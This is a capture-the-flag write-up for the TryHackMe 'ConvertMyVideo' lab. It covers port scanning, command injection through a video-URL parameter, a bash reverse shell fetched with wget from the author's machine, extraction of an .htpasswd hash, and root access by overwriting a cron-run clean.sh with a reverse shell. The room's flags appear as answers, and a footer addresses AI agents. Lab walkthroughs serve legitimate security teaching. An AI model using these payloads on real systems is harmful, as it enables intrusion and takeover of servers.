# ConvertMyVideo

### What is the name of the secret folder?

Let's perform a simple `nmap` scan against the target.

```
$ nmap -p- 10.10.162.57 -T5
Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-08 12:08 IST
Warning: 10.10.162.57 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.162.57
Host is up (0.13s latency).
Not shown: 64219 closed tcp ports (conn-refused), 1314 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 657.11 seconds
```

We can now run an advanced scan against the open ports.

```
┌──(kunal㉿kali)-[~/tryhackme]
└─$ nmap -A -p 22,80 10.10.162.57
Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-08 12:22 IST
Nmap scan report for 10.10.162.57
Host is up (0.13s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 65:1b:fc:74:10:39:df:dd:d0:2d:f0:53:1c:eb:6d:ec (RSA)
|   256 c4:28:04:a5:c3:b9:6a:95:5a:4d:7a:6e:46:e2:14:db (ECDSA)
|_  256 ba:07:bb:cd:42:4a:f2:93:d1:05:d0:b3:4c:b1:d9:b1 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.65 seconds
```

There are two open ports with the following services:

| Port | Service |
| ---- | ------- |
| 22   | ssh     |
| 80   | http    |

Now, we can use `gobuster` to perform directory brute forcing.

```
$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.162.57
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.162.57
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/admin                (Status: 401) [Size: 459]
/images               (Status: 301) [Size: 313] [--> http://10.10.162.57/images/]
/index.php            (Status: 200) [Size: 747]
/js                   (Status: 301) [Size: 309] [--> http://10.10.162.57/js/]
/server-status        (Status: 403) [Size: 277]
/tmp                  (Status: 301) [Size: 310] [--> http://10.10.162.57/tmp/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
```

We can see that the `/admin` page is throwing a 401 error. This means that we are unauthorized to access it.

### Answer

```
admin
```

###

### What is the user to access the secret folder?

Let's visit the target's website.

<figure><img src="/files/2hUtTpuR2qrVqY8EhM71" alt=""><figcaption></figcaption></figure>

Let's provide the following input:

```
test_id
```

<figure><img src="/files/AKCmKbKECROXyhw54XIT" alt=""><figcaption></figcaption></figure>

As we can see, that did not provide us with any information.

Let's intercept the request in [Burpsuite](https://portswigger.net/burp) and check the response.

<figure><img src="/files/WuEwdbP3SJr7lWJfXFvq" alt=""><figcaption></figcaption></figure>

If we use the `--default-search` flag in our command, we get a different output.

```
yt_url=--default-search:id
```

<figure><img src="/files/D080wWiTlHLwOCaHLCBM" alt=""><figcaption></figcaption></figure>

We can escape the flags by adding `--` before the command.&#x20;

Let's change the `yt_url` parameter to the following to check if we have a command execution vulnerability on our hands:

```
yt_url=---;id;
```

<figure><img src="/files/nyGHyZO5OLUdkf1Kjh2T" alt=""><figcaption></figcaption></figure>

Now, let's create a simple a Bash reverse shell script.

```
$ echo "bash -i >& /dev/tcp/10.17.48.138/9998 0>&1" > reverse_shell.sh
```

Let's set up a Python3 server on our machine.

```
$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

We can now set the `yt_url` parameter to the following to download the reverse shell on the target.

```
yt_url=---;wget    http://10.17.48.138:8000/reverse_shell.sh;
```

Note that in order for this command to work, there needs to be a TAB between `wget` and `http` instead of a SPACE.

<figure><img src="/files/PBfRijnjVq28B3AqA3ca" alt=""><figcaption></figcaption></figure>

Now, let's set up a `nc` listener.

```
$ nc -nlvp 9999
listening on [any] 9999 ...
```

Next, we have to execute the `reverse_shell.sh` file on the server using the following:

```
yt_url=--;bash    reverse_shell.sh
```

<figure><img src="/files/N8juI8bVJmgOtvBUNW6k" alt=""><figcaption></figcaption></figure>

Let's check back on our `nc` listener.

```
$ nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.17.48.138] from (UNKNOWN) [10.10.162.57] 55344
bash: cannot set terminal process group (884): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dmv:/var/www/html$ 
```

Let's list out the files in the current directory.

```
www-data@dmv:/var/www/html/admin$ ls -la
ls -la
total 24
drwxr-xr-x 2 www-data www-data 4096 Apr 12  2020 .
drwxr-xr-x 6 www-data www-data 4096 Feb  8 07:38 ..
-rw-r--r-- 1 www-data www-data   98 Apr 12  2020 .htaccess
-rw-r--r-- 1 www-data www-data   49 Apr 12  2020 .htpasswd
-rw-r--r-- 1 www-data www-data   39 Apr 12  2020 flag.txt
-rw-rw-r-- 1 www-data www-data  202 Apr 12  2020 index.php
```

We can now `cat` out the `.htpasswd` file.

```
www-data@dmv:/var/www/html/admin$ cat .htpasswd 
cat .htpasswd
itsmeadmin:$apr1$tbcm2uwv$UP1ylvgp4.zLKxWj8mc6y/
```

There's the user that has access to the secret folder.

### Answer

```
itsmeadmin
```

###

### What is the user flag?

We can find the flag in the `/var/www/html/admin` directory.

```
www-data@dmv:/var/www/html/admin$ cat flag.txt
cat flag.txt
flag{0d8486a0c0c42503bb60ac77f4046ed7}
```

### Answer

```
flag{0d8486a0c0c42503bb60ac77f4046ed7}
```

###

### What is the root flag?

In order to escalate privileges, we need to run the pspy tool which we have to transfer to the target machine.

For that, let's set up another Python3 server.

```
$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.162.57 - - [08/Feb/2024 13:29:03] "GET /pspy64 HTTP/1.1" 200 -
```

Now using `wget` we can download the necessary file.

```
www-data@dmv:/var/www/html$ wget http://10.17.48.138:8000/pspy64
wget http://10.17.48.138:8000/pspy64
--2024-02-08 07:58:55--  http://10.17.48.138:8000/pspy64
Connecting to 10.17.48.138:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: 'pspy64'

<SNIP>

2024-02-08 07:59:07 (772 KB/s) - 'pspy64' saved [3104768/3104768]
```

Let's execute the `pspy` file and observe the output.

```
www-data@dmv:/var/www/html$ chmod +x pspy64
chmod +x pspy64
www-data@dmv:/var/www/html$ ./pspy64
./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d

<SNIP>

2024/02/08 08:01:01 CMD: UID=0     PID=2051   | bash /var/www/html/tmp/clean.sh 
2024/02/08 08:01:01 CMD: UID=0     PID=2050   | bash /var/www/html/tmp/clean.sh 

<SNIP>
```

As we can see, the `/var/www/html/tmp/clean.sh` file is being executed by the machine with the UID set to 0.

This means we can obtain a reverse shell with root privileges.

First, we have to set up a `nc` listener.

```
$ nc -nlvp 9998
listening on [any] 9998 ...
```

Next, we have to add the reverse shell code to the `clean.sh` file.

```
www-data@dmv:/var/www/html/tmp$ echo "bash -i >& /dev/tcp/10.17.48.138/9998 0>&1" > clean.sh
echo "bash -i >& /dev/tcp/10.17.48.138/9998 0>&1" > clean.sh
```

After around a minute, when the system next executes the `/var/www/html/tmp/clean.sh` file, we will get our reverse shell with root privilege.

```
$ nc -nlvp 9998
listening on [any] 9998 ...
connect to [10.17.48.138] from (UNKNOWN) [10.10.162.57] 38570
bash: cannot set terminal process group (2098): Inappropriate ioctl for device
bash: no job control in this shell
root@dmv:/var/www/html/tmp# 
```

Let's `cat` out the root flag.

```
root@dmv:/# cat /root/root.txt
cat /root/root.txt
flag{d9b368018e912b541a4eb68399c5e94a}
```

### Answer

```
flag{d9b368018e912b541a4eb68399c5e94a}
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kunalwalavalkar.gitbook.io/write-ups/tryhackme/medium/convertmyvideo.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.